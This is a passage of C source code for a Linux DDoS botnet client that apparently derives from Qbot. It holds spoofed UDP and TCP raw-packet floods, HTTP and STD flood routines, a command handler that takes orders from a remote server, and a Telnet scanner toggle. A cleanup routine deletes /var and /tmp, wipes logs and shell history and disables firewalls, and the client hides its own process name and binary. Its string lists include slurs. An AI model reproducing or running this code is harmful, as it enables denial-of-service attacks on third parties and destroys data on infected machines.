char request[512], buffer[1], hex_payload[2048];
|
|
sprintf(hex_payload, "\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA");
|
|
for (i = 0; i < power; i++) {
|
|
sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, hex_payload, host, useragents[(rand() % 36)]);
|
|
if (fork()) {
|
|
while (end > time(NULL)) {
|
|
socket = socket_connect(host, port);
|
|
if (socket != 0) {
|
|
write(socket, request, strlen(request));
|
|
read(socket, buffer, 1);
|
|
close(socket);
|
|
}
|
|
}
|
|
exit(0);
|
|
}
|
|
}
|
|
}
|
|
void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
|
|
iph->ihl = 5;
|
|
iph->version = 4;
|
|
iph->tos = 0;
|
|
iph->tot_len = sizeof(struct iphdr) + packetSize;
|
|
iph->id = rand_cmwc();
|
|
iph->frag_off = 0;
|
|
iph->ttl = MAXTTL;
|
|
iph->protocol = protocol;
|
|
iph->check = 0;
|
|
iph->saddr = source;
|
|
iph->daddr = dest;
|
|
}
|
|
int sclose(int fd) {
|
|
if(3 > fd) return 1;
|
|
close(fd);
|
|
return 0;
|
|
}
|
|
void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval, int sleepcheck, int sleeptime) {
|
|
struct sockaddr_in dest_addr;
|
|
dest_addr.sin_family = AF_INET;
|
|
if(port == 0) dest_addr.sin_port = rand_cmwc();
|
|
else dest_addr.sin_port = htons(port);
|
|
if(getHost(target, &dest_addr.sin_addr)) return;
|
|
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
|
|
register unsigned int pollRegister;
|
|
pollRegister = pollinterval;
|
|
if(spoofit == 32) {
|
|
int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
|
|
if(!sockfd) {
|
|
#ifdef PRINTS
|
|
botnetPrint(KadenCommStock, "Failed opening raw socket.");
|
|
#endif
|
|
return;
|
|
}
|
|
unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
|
|
if(buf == NULL) return;
|
|
memset(buf, 0, packetsize + 1);
|
|
makeRandomStr(buf, packetsize);
|
|
int end = time(NULL) + timeEnd;
|
|
register unsigned int i = 0;
|
|
register unsigned int ii = 0;
|
|
while(1) {
|
|
sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
|
|
if(i == pollRegister) {
|
|
if(port == 0) dest_addr.sin_port = rand_cmwc();
|
|
if(time(NULL) > end) break;
|
|
i = 0;
|
|
continue;
|
|
}
|
|
i++;
|
|
if(ii == sleepcheck) {
|
|
usleep(sleeptime*1000);
|
|
ii = 0;
|
|
continue;
|
|
}
|
|
ii++;
|
|
}
|
|
} else {
|
|
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
|
|
if(!sockfd) {
|
|
#ifdef PRINTS
|
|
botnetPrint(KadenCommStock, "Failed opening raw socket.");
|
|
#endif
|
|
return;
|
|
}
|
|
int tmp = 1;
|
|
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
|
|
#ifdef PRINTS
|
|
botnetPrint(KadenCommStock, "Failed setting raw headers mode.");
|
|
#endif
|
|
return;
|
|
}
|
|
int counter = 50;
|
|
while(counter--) {
|
|
srand(time(NULL) ^ rand_cmwc());
|
|
init_rand(rand());
|
|
}
|
|
in_addr_t netmask;
|
|
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
|
|
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
|
|
unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
|
|
struct iphdr *iph = (struct iphdr *)packet;
|
|
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
|
|
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GRIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
|
|
udph->len = htons(sizeof(struct udphdr) + packetsize);
|
|
udph->source = rand_cmwc();
|
|
udph->dest = (port == 0 ? rand_cmwc() : htons(port));
|
|
udph->check = 0;
|
|
makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
|
|
iph->check = csum ((unsigned short *) packet, iph->tot_len);
|
|
int end = time(NULL) + timeEnd;
|
|
register unsigned int i = 0;
|
|
register unsigned int ii = 0;
|
|
while(1) {
|
|
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
|
|
udph->source = rand_cmwc();
|
|
udph->dest = (port == 0 ? rand_cmwc() : htons(port));
|
|
iph->id = rand_cmwc();
|
|
iph->saddr = htonl( GRIP(netmask) );
|
|
iph->check = csum ((unsigned short *) packet, iph->tot_len);
|
|
if(i == pollRegister) {
|
|
if(time(NULL) > end) break;
|
|
i = 0;
|
|
continue;
|
|
}
|
|
i++;
|
|
if(ii == sleepcheck) {
|
|
usleep(sleeptime*1000);
|
|
ii = 0;
|
|
continue;
|
|
}
|
|
ii++;
|
|
}
|
|
}
|
|
}
|
|
void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval) {
|
|
register unsigned int pollRegister;
|
|
pollRegister = pollinterval;
|
|
struct sockaddr_in dest_addr;
|
|
dest_addr.sin_family = AF_INET;
|
|
if(port == 0) dest_addr.sin_port = rand_cmwc();
|
|
else dest_addr.sin_port = htons(port);
|
|
if(getHost(target, &dest_addr.sin_addr)) return;
|
|
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
|
|
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
if(!sockfd) {
|
|
#ifdef PRINTS
|
|
botnetPrint(KadenCommStock, "Failed opening raw socket.");
|
|
#endif
|
|
return;
|
|
}
|
|
int tmp = 1;
|
|
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
|
|
#ifdef PRINTS
|
|
botnetPrint(KadenCommStock, "Failed setting raw headers mode.");
|
|
#endif
|
|
return;
|
|
}
|
|
in_addr_t netmask;
|
|
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
|
|
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
|
|
unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
|
|
struct iphdr *iph = (struct iphdr *)packet;
|
|
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GRIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
|
|
tcph->source = rand_cmwc();
|
|
tcph->seq = rand_cmwc();
|
|
tcph->ack_seq = 0;
|
|
tcph->doff = 5;
|
|
if(!strcmp(flags, "all")) {
|
|
tcph->syn = 1;
|
|
tcph->rst = 1;
|
|
tcph->fin = 1;
|
|
tcph->ack = 1;
|
|
tcph->psh = 1;
|
|
} else {
|
|
unsigned char *pch = strtok(flags, ",");
|
|
while(pch) {
|
|
if(!strcmp(pch, "syn")) {
|
|
tcph->syn = 1;
|
|
} else if(!strcmp(pch, "rst")) {
|
|
tcph->rst = 1;
|
|
} else if(!strcmp(pch, "fin")) {
|
|
tcph->fin = 1;
|
|
} else if(!strcmp(pch, "ack")) {
|
|
tcph->ack = 1;
|
|
} else if(!strcmp(pch, "psh")) {
|
|
tcph->psh = 1;
|
|
} else {
|
|
#ifdef PRINTS
|
|
botnetPrint(KadenCommStock, "Invalid flag \"%s\"", pch);
|
|
#endif
|
|
}
|
|
pch = strtok(NULL, ",");
|
|
}
|
|
}
|
|
tcph->window = rand_cmwc();
|
|
tcph->check = 0;
|
|
tcph->urg_ptr = 0;
|
|
tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
|
|
tcph->check = tcpcsum(iph, tcph);
|
|
iph->check = csum ((unsigned short *) packet, iph->tot_len);
|
|
int end = time(NULL) + timeEnd;
|
|
register unsigned int i = 0;
|
|
while(1) {
|
|
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
|
|
iph->saddr = htonl( GRIP(netmask) );
|
|
iph->id = rand_cmwc();
|
|
tcph->seq = rand_cmwc();
|
|
tcph->source = rand_cmwc();
|
|
tcph->check = 0;
|
|
tcph->check = tcpcsum(iph, tcph);
|
|
iph->check = csum ((unsigned short *) packet, iph->tot_len);
|
|
if(i == pollRegister) {
|
|
if(time(NULL) > end) break;
|
|
i = 0;
|
|
continue;
|
|
}
|
|
i++;
|
|
}
|
|
}
|
|
void sendSTD(unsigned char *ip, int port, int secs) {
|
|
int iSTD_Sock;
|
|
iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
|
|
time_t start = time(NULL);
|
|
struct sockaddr_in sin;
|
|
struct hostent *hp;
|
|
hp = gethostbyname(ip);
|
|
bzero((char*) &sin,sizeof(sin));
|
|
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
|
|
sin.sin_family = hp->h_addrtype;
|
|
sin.sin_port = port;
|
|
unsigned int a = 0;
|
|
while(1){
|
|
char *randstrings[] = {"VSzNC0CJti3ouku", "yhJyMAqx7DZa0kg", "1Cp9MEDMN6B5L1K", "niggaNiggerXds", "muchpower", "9XdSldsd", "Xddsslslsls", "eNxERkyrfR", "qHjTXcMbzH", "chickennuggets", "ilovecocaine", "666666", "88888888", "0nnf0l20im", "uq7ajzgm0a", "smac", "ParasJhaIsADumbFag", "stdudpbasedflood", "bitcoin1", "password", "eRaGonBotNet", "suckmyFOUND", "guardiacivil", "2xoJTsbXunuj", "QiMH8CGJyOj9", "abcd1234", "GLEQWXHAJPWM", "ABCDEFGHI", "Eragon", "qbotbotnet", "lizardsquad", "aNrjBnTRi", "1QD8ypG86", "IVkLWYjLe", "kadenthegod", "satoriskidsnet"};
|
|
char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
|
|
if (a >= 50)
|
|
{
|
|
send(iSTD_Sock, STD2_STRING, STD_PIGZ, 0);
|
|
connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
|
|
if (time(NULL) >= start + secs)
|
|
{
|
|
close(iSTD_Sock);
|
|
_exit(0);
|
|
}
|
|
a = 0;
|
|
}
|
|
a++;
|
|
}
|
|
}
|
|
void processCmd(int argc, unsigned char *argv[]) {
|
|
if(!strcmp(argv[0], "TELNET")) {
|
|
if(!strcmp(argv[1], "OFF")) {
|
|
if(botnetPid == 0) return;
|
|
kill(botnetPid, 9);
|
|
botnetPid = 0;
|
|
}
|
|
if(!strcmp(argv[1], "ON")) {
|
|
if(botnetPid != 0) return;
|
|
uint32_t parent;
|
|
parent = fork();
|
|
int threads = 1000;
|
|
int timeout = 10;
|
|
if (parent > 0) { botnetPid = parent; return;}
|
|
else if(parent == -1) return;
|
|
botnetTScan(timeout, threads);
|
|
_exit(0);
|
|
}
|
|
}
|
|
if(!strcmp(argv[0], "UDP")) {
|
|
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65536 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1)) {
|
|
return;
|
|
}
|
|
unsigned char *ip = argv[1];
|
|
int port = atoi(argv[2]);
|
|
int time = atoi(argv[3]);
|
|
int spoofed = atoi(argv[4]);
|
|
int packetsize = atoi(argv[5]);
|
|
int pollinterval = (argc > 6 ? atoi(argv[6]) : 1000);
|
|
int sleepcheck = (argc > 7 ? atoi(argv[7]) : 1000000);
|
|
int sleeptime = (argc > 8 ? atoi(argv[8]) : 0);
|
|
if(strstr(ip, ",") != NULL) {
|
|
unsigned char *hi = strtok(ip, ",");
|
|
while(hi != NULL) {
|
|
if(!listFork()) {
|
|
sendUDP(hi, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
|
|
_exit(0);
|
|
}
|
|
hi = strtok(NULL, ",");
|
|
}
|
|
} else {
|
|
if (!listFork()){
|
|
sendUDP(ip, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
|
|
_exit(0);
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
if(!strcmp(argv[0], "TCP")) {
|
|
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1)) {
|
|
return;
|
|
}
|
|
unsigned char *ip = argv[1];
|
|
int port = atoi(argv[2]);
|
|
int time = atoi(argv[3]);
|
|
int spoofed = atoi(argv[4]);
|
|
unsigned char *flags = argv[5];
|
|
int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
|
|
int psize = argc > 6 ? atoi(argv[6]) : 0;
|
|
if(strstr(ip, ",") != NULL) {
|
|
unsigned char *hi = strtok(ip, ",");
|
|
while(hi != NULL) {
|
|
if(!listFork()) {
|
|
sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
|
|
_exit(0);
|
|
}
|
|
hi = strtok(NULL, ",");
|
|
}
|
|
} else {
|
|
if (!listFork()) {
|
|
sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
|
|
_exit(0);
|
|
}
|
|
}
|
|
}
|
|
if (!strcmp(argv[0], "HTTP"))
|
|
{
|
|
// !* HTTP METHOD TARGET PORT PATH TIME POWER
|
|
// !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
|
|
if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
|
|
if (listFork()) return;
|
|
SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
|
|
exit(0);
|
|
}
|
|
if (!strcmp(argv[0], "HTTPHEX"))
|
|
{
|
|
if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
|
|
if (listFork()) return;
|
|
SendHTTPHex(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
|
|
exit(0);
|
|
}
|
|
if(!strcmp(argv[0], "STD")) //STD TARGET PORT TIME
|
|
{
|
|
if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
|
|
{
|
|
return;
|
|
}
|
|
unsigned char *ip = argv[1];
|
|
int port = atoi(argv[2]);
|
|
int time = atoi(argv[3]);
|
|
if(strstr(ip, ",") != NULL)
|
|
{
|
|
unsigned char *hi = strtok(ip, ",");
|
|
while(hi != NULL)
|
|
{
|
|
if(!listFork())
|
|
{
|
|
sendSTD(hi, port, time);
|
|
_exit(0);
|
|
}
|
|
hi = strtok(NULL, ",");
|
|
}
|
|
} else {
|
|
if (listFork()) { return; }
|
|
sendSTD(ip, port, time);
|
|
_exit(0);
|
|
}
|
|
}
|
|
if(!strcmp(argv[0], "KILLATTK")) {
|
|
int killed = 0;
|
|
unsigned long i;
|
|
for (i = 0; i < numpids; i++) {
|
|
if (pids[i] != 0 && pids[i] != getpid()) {
|
|
kill(pids[i], 9);
|
|
killed++;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
int getOurIP() {
|
|
int sock = socket(AF_INET, SOCK_DGRAM, 0);
|
|
if(sock == -1) return 0;
|
|
struct sockaddr_in serv;
|
|
memset(&serv, 0, sizeof(serv));
|
|
serv.sin_family = AF_INET;
|
|
serv.sin_addr.s_addr = inet_addr("8.8.8.8");
|
|
serv.sin_port = htons(53);
|
|
int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
|
|
if(err == -1) return 0;
|
|
struct sockaddr_in name;
|
|
socklen_t namelen = sizeof(name);
|
|
err = getsockname(sock, (struct sockaddr*) &name, &namelen);
|
|
if(err == -1) return 0;
|
|
ourIP.s_addr = name.sin_addr.s_addr;
|
|
int cmdline = open("/proc/net/route", O_RDONLY);
|
|
char linebuf[4096];
|
|
while(fdgets(linebuf, 4096, cmdline) != NULL) {
|
|
if(strstr(linebuf, "\t00000000\t") != NULL) {
|
|
unsigned char *pos = linebuf;
|
|
while(*pos != '\t') pos++;
|
|
*pos = 0;
|
|
break;
|
|
}
|
|
memset(linebuf, 0, 4096);
|
|
}
|
|
close(cmdline);
|
|
if(*linebuf) {
|
|
int i;
|
|
struct ifreq ifr;
|
|
strcpy(ifr.ifr_name, linebuf);
|
|
ioctl(sock, SIOCGIFHWADDR, &ifr);
|
|
for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
|
|
}
|
|
close(sock);
|
|
}
|
|
int getEndianness(void)
|
|
{
|
|
union
|
|
{
|
|
uint32_t vlu;
|
|
uint8_t data[sizeof(uint32_t)];
|
|
} nmb;
|
|
nmb.data[0] = 0x00;
|
|
nmb.data[1] = 0x01;
|
|
nmb.data[2] = 0x02;
|
|
nmb.data[3] = 0x03;
|
|
switch (nmb.vlu)
|
|
{
|
|
case UINT32_C(0x00010203):
|
|
return "BIG_ENDIAN";
|
|
case UINT32_C(0x03020100):
|
|
return "LITTLE_ENDIAN";
|
|
case UINT32_C(0x02030001):
|
|
return "BIG_ENDIAN_W";
|
|
case UINT32_C(0x01000302):
|
|
return "LITTLE_ENDIAN_W";
|
|
default:
|
|
return "UNKNOWN";
|
|
}
|
|
}
|
|
int initConnection() {
|
|
unsigned char server[4096];
|
|
memset(server, 0, 4096);
|
|
if(KadenCommStock) { close(KadenCommStock); KadenCommStock = 0; }
|
|
if(botnetServer + 1 == SERVER_LIST_SIZE) botnetServer = 0;
|
|
else botnetServer++;
|
|
strcpy(server, ServerInfo[botnetServer]);
|
|
int port = Server_Botport;
|
|
if(strchr(server, ':') != NULL) {
|
|
port = atoi(strchr(server, ':') + 1);
|
|
*((unsigned char *)(strchr(server, ':'))) = 0x0;
|
|
}
|
|
KadenCommStock = socket(AF_INET, SOCK_STREAM, 0);
|
|
if(!connectTimeout(KadenCommStock, server, port, 30)) return 1;
|
|
return 0;
|
|
}
|
|
void UpdateNameSrvs()
|
|
{
|
|
uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
|
|
if (access("/etc/resolv.conf", F_OK) != -1) {
|
|
const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
|
|
size_t resl = strlen(resd);
|
|
write(fhandler, resd, resl);
|
|
} else { return; }
|
|
close(fhandler);
|
|
}
|
|
void RemoveTempDirs()
|
|
{
|
|
system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
|
|
system("rm -rf /var/log/wtmp");
|
|
system("rm -rf /tmp/*");
|
|
system("rm -rf /bin/netstat");
|
|
system("iptables -F");
|
|
system("pkill -9 busybox");
|
|
system("pkill -9 perl");
|
|
system("pkill -9 python");
|
|
system("service iptables stop");
|
|
system("/sbin/iptables -F; /sbin/iptables -X");
|
|
system("service firewalld stop");
|
|
system("rm -rf ~/.bash_history");
|
|
system("history -c");
|
|
}
|
|
int main(int argc, unsigned char *argv[]) {
|
|
char name_buf[32];
|
|
char id_buf[32];
|
|
int name_buf_len;
|
|
if(SERVER_LIST_SIZE <= 0) return 0;
|
|
unlink(argv[0]);
|
|
rand_init();
|
|
name_buf_len = ((rand_next() % 4) + 3) * 4;
|
|
rand_alphastr(name_buf, name_buf_len);
|
|
name_buf[name_buf_len] = 0;
|
|
util_strcpy(argv[0], name_buf);
|
|
name_buf_len = ((rand_next() % 6) + 3) * 4;
|
|
rand_alphastr(name_buf, name_buf_len);
|
|
name_buf[name_buf_len] = 0;
|
|
prctl(PR_SET_NAME, name_buf);
|
|
srand(time(NULL) ^ getpid());
|
|
rand_init();
|
|
pid_t pid1;
|
|
pid_t pid2;
|
|
int status;
|
|
getOurIP();
|
|
if (pid1 = fork()) {
|
|
waitpid(pid1, &status, 0);
|
|
exit(0);
|
|
} else if (!pid1) {
|
|
if (pid2 = fork()) {
|
|
exit(0);
|
|
} else if (!pid2) {
|
|
} else {
|
|
}
|
|
} else {
|
|
}
|
|
chdir("/");
|
|
signal(SIGPIPE, SIG_IGN);
|
|
while(1) {
|
|
if(initConnection()) { continue; }
|
|
botnetPrint(KadenCommStock, "[ ERAGON ] \e[96m[%s] \e[97mConnected -> %s -> %s",getBuildz(), inet_ntoa(ourIP), getBuild(), getEndianness(), VERSION);
|
|
UpdateNameSrvs();
|
|
RemoveTempDirs();
|
|
// port_closer(); to OP against SSH... Dont open or you are a nigger fosho (Recks Bots)
|
|
char commBuf[4096];
|
|
int got = 0;
|
|
int i = 0;
|
|
while((got = recvLine(KadenCommStock, commBuf, 4096)) != -1) {
|
|
for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
|
|
unsigned int *newpids, on;
|
|
for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
|
|
pids[on - 1] = 0;
|
|
numpids--;
|
|
newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
|
|
for (on = 0; on < numpids; on++) newpids[on] = pids[on];
|
|
free(pids);
|
|
pids = newpids;
|
|
}
|
|
commBuf[got] = 0x00;
|
|
trim(commBuf);
|
|
unsigned char *message = commBuf;
|
|
if(*message == '!') {
|
|
unsigned char *nickMask = message + 1;
|
|
while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
|
|
if(*nickMask == 0x00) continue;
|
|
*(nickMask) = 0x00;
|
|
nickMask = message + 1;
|
|
message = message + strlen(nickMask) + 2;
|
|
while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
|
|
unsigned char *command = message;
|
|
while(*message != ' ' && *message != 0x00) message++;
|
|
*message = 0x00;
|
|
message++;
|
|
unsigned char *tmpcommand = command;
|
|
while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
|
|
unsigned char *params[10];
|
|
int paramsCount = 1;
|
|
unsigned char *pch = strtok(message, " ");
|
|
params[0] = command;
|
|
while(pch) {
|
|
if(*pch != '\n') {
|
|
params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
|
|
memset(params[paramsCount], 0, strlen(pch) + 1);
|
|
strcpy(params[paramsCount], pch);
|
|
paramsCount++;
|
|
}
|
|
pch = strtok(NULL, " ");
|
|
}
|
|
processCmd(paramsCount, params);
|
|
if(paramsCount > 1) {
|
|
int q = 1;
|
|
for(q = 1; q < paramsCount; q++) {
|
|
free(params[q]);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
return 0;
|
|
}
|